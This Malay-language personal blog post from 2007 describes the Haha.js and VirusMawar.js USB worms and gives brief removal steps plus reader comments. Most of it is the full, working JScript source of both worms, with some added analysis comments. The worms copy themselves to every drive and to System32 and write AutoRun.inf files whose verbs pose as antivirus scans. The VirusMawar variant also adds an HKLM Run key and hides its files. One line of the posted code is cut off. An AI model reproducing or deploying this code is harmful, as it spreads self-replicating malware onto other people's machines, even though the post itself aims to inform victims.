Najib’Palace

Personal weblog with news of software, hardware, technology, tips and tricks

virusmawar.js

Klik Kat Sini utk mengetahui cara cara nak remove virus haha.js , mawarvirus tu.

rasanye dah lama kot virus ni tersebar, virus ni tak kacau ape ape cuma saje dia nak mengatal beranak pinak kat semua removable disk yang korang insert kat pc korang tu.

nie contoh isi perut virus Haha.js

Haha.js

// Haha v1.0.0.2
// Analysis notes added for readers; the code below is unchanged.
//  - Windows Script Host JScript that reads its own source and writes it to the
//    System32 folder and to the root of every removable and fixed drive except
//    A:, together with an AutoRun.inf that starts the copy through wscript.exe.
//  - Artifacts visible in this listing: \Haha.js and \AutoRun.inf at drive
//    roots, Haha.js in System32 (all set to attributes 39), and the registry
//    value HKCU\Software\Microsoft\Internet Explorer\Main\Window Title = "Haha".
//  - Every try block ends in an empty catch, so failures are never reported.
// Constant
// File names are appended to a drive path or to the System32 path.
var ThisFileName = “\\Haha.js“;
var AutorunFileName = “\\AutoRun.inf“;
var CRLF = “\r\n”;
// Values compared against Drive.DriveType below.
var RemovableDrive = 1;
var FixedDrive = 2;
// Delays passed to WScript.Sleep (milliseconds).
var DelayStart = 10000;
var DelayProcess = 1000;
var DelayFixedDrive = 60000;

// Global Variable
var ThisText,AutorunText,tf,RegPath;

// Text of the AutoRun.inf that is written to each drive. Open, shellexecute and
// every shell verb point at wscript.exe running this script, including verbs
// labelled "Scan for Viruses", "Scan with Norton AntiVirus" and "Scan with AVG".
// Only the Explore verb passes -Clicked.
AutorunText = “[autorun]” + CRLF;
AutorunText = AutorunText + “Open = wscript.exe ” + ThisFileName + CRLF;
AutorunText = AutorunText + “shellexecute = wscript.exe ” + ThisFileName + CRLF;
AutorunText = AutorunText + “shell\\Open\\command = wscript.exe ” + ThisFileName + CRLF;
AutorunText = AutorunText + “shell\\Explore\\command = wscript.exe ” + ThisFileName + ” -Clicked” + CRLF;
AutorunText = AutorunText + “shell\\AutoPlay\\command = wscript.exe ” + ThisFileName + CRLF;
AutorunText = AutorunText + “shell\\Scan for Viruses\\command = wscript.exe ” + ThisFileName + CRLF;
AutorunText = AutorunText + “shell\\Scan with Norton AntiVirus\\command = wscript.exe ” + ThisFileName + CRLF;
AutorunText = AutorunText + “shell\\Scan with AVG\\command = wscript.exe ” + ThisFileName + CRLF;
AutorunText = AutorunText + “shell = Explore”;

var fs = new ActiveXObject(“Scripting.FileSystemObject”);
var ThisPath = fs.GetFile(WScript.ScriptFullname);
// Drive type of the drive this copy of the script was started from.
var check = ThisPath.Drive.DriveType;

var WinPath = new String(fs.GetSpecialFolder(0)); // Windows Folder
var SysPath = new String(fs.GetSpecialFolder(1)); // System32 Folder
var aShell = new ActiveXObject(“WScript.Shell”);

// Open the explorer if double clicked
// With -Clicked, Explorer is started on the first three characters of the
// script path (presumably the drive root, e.g. "E:\"), so the user still gets
// a folder window.
var aArgs = WScript.Arguments;
for (var i = 0; i < aArgs.length; i++)
{
if(aArgs(i) == “-Clicked”)
{
aShell.Run(WinPath + “\\explorer.exe ” + WScript.ScriptFullname.substr(0,3));
}
}

// Waits 10 seconds before touching any file.
WScript.Sleep(DelayStart);

// Read this script's own source into ThisText (original comment: copy itself
// and save it in the Windows dir; the write below targets SysPath, System32).
var text;
try
{
text = ThisPath.OpenAsTextStream(1,-2); // 1 = open for reading, -2 = system default encoding
ThisText = “”;
while (!text.AtendOfStream) // copy this file to the ThisText
{
ThisText = ThisText + text.ReadLine();
ThisText = ThisText + “\n”;
}
} catch(e){}

// One pass writes the System32 copy, the per-drive copies and the registry
// value. The loop condition at the bottom decides whether the pass repeats.
do
{
try
{
if (fs.FileExists(SysPath + ThisFileName))
{
// Attributes are reset to Archive only before the existing copy is overwritten.
tf = fs.GetFile(SysPath + ThisFileName);
tf.Attributes = 32; // Archive
}
tf = fs.CreateTextFile(SysPath + ThisFileName, 2, true); // overwrite, Unicode
tf.Write(ThisText);
tf.Close();
tf = fs.GetFile(SysPath + ThisFileName);
tf.Attributes = 39; // Archive, ReadOnly, Hidden, System
} catch(e){}

// Walk every drive known to the FileSystemObject.
var DrivesEnum = new Enumerator(fs.Drives);
var aDrive;
for (; !DrivesEnum.atEnd(); DrivesEnum.moveNext())
{
aDrive = DrivesEnum.item();
// Fixed disks are included, not only removable media; A: is skipped.
if ((aDrive.DriveType == RemovableDrive || aDrive.DriveType == FixedDrive) && aDrive.Path != “A:”) // 1 – Removable, 2 – Fixed
{
// Copy itself to the root of the drive (original comment says flash drive).
try
{
if (fs.FileExists(aDrive.Path + ThisFileName))
{
tf = fs.GetFile(aDrive.Path + ThisFileName);
tf.Attributes = 32;
}
tf = fs.CreateTextFile(aDrive.Path + ThisFileName, 2, true);
tf.Write(ThisText);
tf.Close();
tf = fs.GetFile(aDrive.Path + ThisFileName);
tf.Attributes = 39;
} catch(e){}

// Write AutoRun.inf to the root of the drive, replacing any existing one.
try
{
if (fs.FileExists(aDrive.Path + AutorunFileName))
{
tf = fs.GetFile(aDrive.Path + AutorunFileName);
tf.Attributes = 32;
}
tf = fs.CreateTextFile(aDrive.Path + AutorunFileName, 2, true);
tf.Write(AutorunText);
tf.Close();
tf = fs.GetFile(aDrive.Path + AutorunFileName);
tf.Attributes = 39;
} catch(e){}
}
}

// set registry
// The HKLM Run entry and the ShowSuperHidden change are commented out in this
// listing, so the only registry write here is the Internet Explorer
// "Window Title" value. Cleanup has to reset that value as well as delete the files.
try
{
WScript.Sleep(DelayProcess);
//RegPath = “HKEY_LOCAL_MACHINE”;
//RegPath = RegPath + “\\Software\\Microsoft\\Windows\\CurrentVersion\\Run“;
//RegPath = RegPath + “\\Haha“;
//aShell.RegWrite(RegPath, “wscript.exe ” + SysPath + ThisFileName, “REG_SZ”);
//RegPath = “HKEY_CURRENT_USER”;
//RegPath = RegPath + “\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced“;
//RegPath = RegPath + “\\ShowSuperHidden“;
//aShell.RegWrite(RegPath, 0, “REG_DWORD”);
RegPath = “HKEY_CURRENT_USER”;
RegPath = RegPath + “\\Software\\Microsoft\\Internet Explorer\\Main”;
RegPath = RegPath + “\\Window Title”;
aShell.RegWrite(RegPath, “Haha”, “REG_SZ”);
} catch(e){}

// wait 1 min for fixed drv
if (check != RemovableDrive)
WScript.Sleep(DelayFixedDrive);

// Repeats only when the script was not started from a removable drive and its
// path begins with the same three characters as the System32 path; that copy
// rewrites the files on all drives once a minute.
} while(check != RemovableDrive && WScript.ScriptFullname.substr(0,3).toLowerCase() == SysPath.substr(0,3).toLowerCase())

// Run system Haha before this Haha closed
// A copy started from a removable drive makes one pass, then starts the
// System32 copy through wscript.exe.
if (check == RemovableDrive)
aShell.Run(“wscript.exe ” + SysPath + ThisFileName);
———————————————————

nie lak isi perut sekutu dia

autorun.js

; Content of the AutoRun.inf placed next to the script at the root of a drive;
; it matches the text the script listings on this page build in AutorunText.
; Windows only honours these entries when AutoRun is enabled for the drive
; type (NoDriveTypeAutoRun policy), so disabling AutoRun for removable media
; removes this launch path.
[autorun]
; Started when AutoRun fires for the drive.
Open = wscript.exe \VirusMawar.js
shellexecute = wscript.exe \VirusMawar.js
; Context-menu verbs for the drive. Every one of them, including the entries
; labelled as antivirus scans, starts the same script.
shell\Open\command = wscript.exe \VirusMawar.js
shell\Explore\command = wscript.exe \VirusMawar.js -Clicked
shell\AutoPlay\command = wscript.exe \VirusMawar.js
shell\Scan for Viruses\command = wscript.exe \VirusMawar.js
shell\Scan with Norton AntiVirus\command = wscript.exe \VirusMawar.js
shell\Scan with AVG\command = wscript.exe \VirusMawar.js
; Makes Explore the default verb, i.e. the one that passes -Clicked.
shell = Explore

————————————

yang ni aku rasa baru je aku jumpa dalam pc aku nieh…VirusMawar.js. cara dia beroperasi sama dengan Haha.js

VirusMawar.js

// Haha1.0.0.2
// Analysis notes added for readers; the code below is unchanged.
//  - Same structure as the Haha.js listing on this page, with the file name
//    VirusMawar.js, attribute changes on a companion file Mwrdy.exe, and the
//    registry writes that are commented out in Haha.js enabled here.
//  - Artifacts visible in this listing: \VirusMawar.js and \AutoRun.inf at
//    drive roots, VirusMawar.js in System32, the HKLM Run value "VirusMawar",
//    HKCU ...\Explorer\Advanced\ShowSuperHidden = 0, and a changed Internet
//    Explorer "Window Title" value.
//  - Every try block ends in an empty catch, so failures are never reported.

// Constant

var ThisFileName = “\\VirusMawar.js“;

// Companion executable name. This listing only changes its attributes and
// never creates or writes the file. NOTE(review): the line is cut off as posted.
var Mwrdy=”\\Mwrdy.exe

var AutorunFileName = “\\AutoRun.inf“;

var CRLF = “\r\n”;

// Values compared against Drive.DriveType below.
var RemovableDrive = 1;

var FixedDrive = 2;

// Delays passed to WScript.Sleep (milliseconds).
var DelayStart = 10000;

var DelayProcess = 1000;

var DelayFixedDrive = 60000;

// Global Variable

var ThisText,AutorunText,tf,RegPath;

// Text of the AutoRun.inf that is written to each drive. Open, shellexecute and
// every shell verb point at wscript.exe running this script, including verbs
// labelled as antivirus scans. Only the Explore verb passes -Clicked.
AutorunText = “[autorun]” + CRLF;

AutorunText = AutorunText + “Open = wscript.exe ” + ThisFileName + CRLF;

AutorunText = AutorunText + “shellexecute = wscript.exe ” + ThisFileName + CRLF;

AutorunText = AutorunText + “shell\\Open\\command = wscript.exe ” + ThisFileName + CRLF;

AutorunText = AutorunText + “shell\\Explore\\command = wscript.exe ” + ThisFileName + ” -Clicked” + CRLF;

AutorunText = AutorunText + “shell\\AutoPlay\\command = wscript.exe ” + ThisFileName + CRLF;

AutorunText = AutorunText + “shell\\Scan for Viruses\\command = wscript.exe ” + ThisFileName + CRLF;

AutorunText = AutorunText + “shell\\Scan with Norton AntiVirus\\command = wscript.exe ” + ThisFileName + CRLF;

AutorunText = AutorunText + “shell\\Scan with AVG\\command = wscript.exe ” + ThisFileName + CRLF;

AutorunText = AutorunText + “shell = Explore”;

var fs = new ActiveXObject(“Scripting.FileSystemObject”);

var ThisPath = fs.GetFile(WScript.ScriptFullname);

// Drive type of the drive this copy of the script was started from.
var check = ThisPath.Drive.DriveType;

var WinPath = new String(fs.GetSpecialFolder(0)); // Windows Folder

var SysPath = new String(fs.GetSpecialFolder(1)); // System32 Folder

var aShell = new ActiveXObject(“WScript.Shell”);

// Open the explorer if double clicked
// With -Clicked, Explorer is started on the first three characters of the
// script path (presumably the drive root), so the user still gets a folder window.

var aArgs = WScript.Arguments;

for (var i = 0; i < aArgs.length; i++)

{

if(aArgs(i) == “-Clicked”)

{

aShell.Run(WinPath + “\\explorer.exe ” + WScript.ScriptFullname.substr(0,3));

}

}

// Waits 10 seconds before touching any file.
WScript.Sleep(DelayStart);

// Read this script's own source into ThisText (original comment: copy itself
// and save it in the Windows dir; the write below targets SysPath, System32).

var text;

try

{

text = ThisPath.OpenAsTextStream(1,-2); // 1 = open for reading, -2 = system default encoding

ThisText = “”;

while (!text.AtendOfStream) // copy this file to the ThisText

{

ThisText = ThisText + text.ReadLine();

ThisText = ThisText + “\n”;

}

} catch(e){}

// One pass writes the System32 copy, the per-drive copies and the registry
// values. The loop condition at the bottom decides whether the pass repeats.
do

{

try

{

if (fs.FileExists(SysPath + ThisFileName))

{

// Attributes are reset to Archive only before the existing copy is overwritten.
tf = fs.GetFile(SysPath + ThisFileName);

tf.Attributes = 32;

tf2 = fs.GetFile(SysPath + Mwrdy);

tf2.Attributes = 32;// Archive

}

tf = fs.CreateTextFile(SysPath + ThisFileName, 2, true); // overwrite, Unicode

tf.Write(ThisText);

tf.Close();

tf = fs.GetFile(SysPath + ThisFileName);

tf.Attributes = 39;

tf2 = fs.GetFile(SysPath + Mwrdy);

tf2.Attributes = 39;// Archive, ReadOnly, Hidden, System

} catch(e){}

// Walk every drive known to the FileSystemObject.
var DrivesEnum = new Enumerator(fs.Drives);

var aDrive;

for (; !DrivesEnum.atEnd(); DrivesEnum.moveNext())

{

aDrive = DrivesEnum.item();

// Fixed disks are included, not only removable media; A: is skipped.
if ((aDrive.DriveType == RemovableDrive || aDrive.DriveType == FixedDrive) && aDrive.Path != “A:”) // 1 – Removable, 2 – Fixed

{

// Copy itself to the root of the drive (original comment says flash drive).

try

{

if (fs.FileExists(aDrive.Path + ThisFileName))

{

tf = fs.GetFile(aDrive.Path + ThisFileName);

tf.Attributes = 32;

tf2 = fs.GetFile(aDrive.Path + Mwrdy);

tf2.Attributes = 32;

}

tf = fs.CreateTextFile(aDrive.Path + ThisFileName, 2, true);

tf.Write(ThisText);

tf.Close();

tf = fs.GetFile(aDrive.Path + ThisFileName);

tf.Attributes = 39;

tf2 = fs.GetFile(aDrive.Path + Mwrdy);

tf2.Attributes = 39;

} catch(e){}

// Write AutoRun.inf to the root of the drive, replacing any existing one.

try

{

if (fs.FileExists(aDrive.Path + AutorunFileName))

{

tf = fs.GetFile(aDrive.Path + AutorunFileName);

tf.Attributes = 32;

}

tf = fs.CreateTextFile(aDrive.Path + AutorunFileName, 2, true);

tf.Write(AutorunText);

tf.Close();

tf = fs.GetFile(aDrive.Path + AutorunFileName);

tf.Attributes = 39;

} catch(e){}

}

}

// set registry
// Three values are written: an HKLM Run entry that starts the System32 copy
// through wscript.exe, ShowSuperHidden = 0 under HKCU Explorer\Advanced, and
// the Internet Explorer "Window Title" string. Cleanup has to revert these
// values as well as delete the files.

try

{

WScript.Sleep(DelayProcess);

RegPaths = “HKEY_LOCAL_MACHINE”;

RegPaths = RegPaths + “\\Software\\Microsoft\\Windows\\CurrentVersion\\Run“;

RegPaths = RegPaths + “\\VirusMawar“;

aShell.RegWrite(RegPaths, “wscript.exe ” + SysPath + ThisFileName, “REG_SZ”);

RegPathss = “HKEY_CURRENT_USER”;

RegPathss = RegPathss + “\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced“;

RegPathss = RegPathss + “\\ShowSuperHidden“;

// presumably keeps files carrying the System and Hidden attributes out of Explorer's view; confirm on the affected Windows version
aShell.RegWrite(RegPathss, 0, “REG_DWORD”);

RegPath = “HKEY_CURRENT_USER”;

RegPath = RegPath + “\\Software\\Microsoft\\Internet Explorer\\Main”;

RegPath = RegPath + “\\Window Title”;

aShell.RegWrite(RegPath, “Virus Mawar SEDANG MENGGANAS WARHAHAHAHAHAHAHA++++=====”, “REG_SZ”);

} catch(e){}

// wait 1 min for fixed drv

if (check != RemovableDrive)

WScript.Sleep(DelayFixedDrive);

// Repeats only when the script was not started from a removable drive and its
// path begins with the same three characters as the System32 path; that copy
// rewrites the files on all drives once a minute.
} while(check != RemovableDrive && WScript.ScriptFullname.substr(0,3).toLowerCase() == SysPath.substr(0,3).toLowerCase())

// Run system VirusMawar before this VirusMawar closed
// A copy started from a removable drive makes one pass, then starts the
// System32 copy through wscript.exe.

if (check == RemovableDrive)

aShell.Run(“wscript.exe ” + SysPath + ThisFileName);

salah satu cara nak remove virus nie korang download software Scotty Winpatrol dan search files Haha.js / Autorun.inf / VirusMawar.js lepas tu right-click then pilih “Delete On Reboot” lepas tu korang search dalam internet files UnHookExec.inf then download pastu double-click files UnHookExec.inf. taraaaaa lepas tu dah cuci pon komputer korank. ada pe pe masalah leh email starbucks.cafe@gmail.com atau layan je frenster aku www.friendster.com/ariyako

November 29, 2007 - Posted by | Virus-Tech

4 Comments »

  1. salam,
    aku dah delete kt winpatrol, tp tak boleh run UnHookExec.inf. acess denied… kenapa ya???

    Comment by Nasir | February 7, 2008 | Reply

  2. bole x btkan anti virus yang xkena install kat pc sendiri..maksudnya anda sediakan perkhidmatan scan virus mawar ni secara percuma?

    Comment by ila | February 12, 2008 | Reply

  3. uit.. igt sonang ke nk wt ntvirus cik adik oi..

    Comment by hunterz | March 18, 2008 | Reply

  4. kekekek nak wat ntvirus tu senang tapi nak wat software nt virus tu susah..pening tak ngan ayat tu..muheheheh :D…

    Comment by ariyako | April 20, 2008 | Reply

